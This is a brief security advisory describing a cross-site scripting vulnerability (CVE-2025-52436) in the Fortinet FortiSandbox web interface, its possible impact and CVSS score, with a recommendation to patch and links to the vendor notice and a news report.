EXECUTIVE SUMMARY:
Fortinet FortiSandbox contains a CVE-2025-52436 high‑severity cross‑site scripting (XSS) vulnerability stemming from improper input sanitization in the GUI, allowing unauthenticated attackers to craft malicious HTTP requests that inject executable script into the web interface; when an administrator or other privileged user interacts with the tainted page, the injected code can trigger and escalate into remote command execution, potentially leading to unauthorized access, data exfiltration, lateral movement, and evasion of sandboxing protections unless patched or mitigated through network segmentation and access controls. The vulnerability has a CVSS score of 7.9.
RECOMMENDATION:
We strongly recommend you update FortiSandbox to below link:
https://fortiguard.fortinet.com/psirt/FG-IR-25-093
REFERENCES:
The following reports contain further technical details:
https://cybersecuritynews.com/fortisandbox-xss-vulnerability/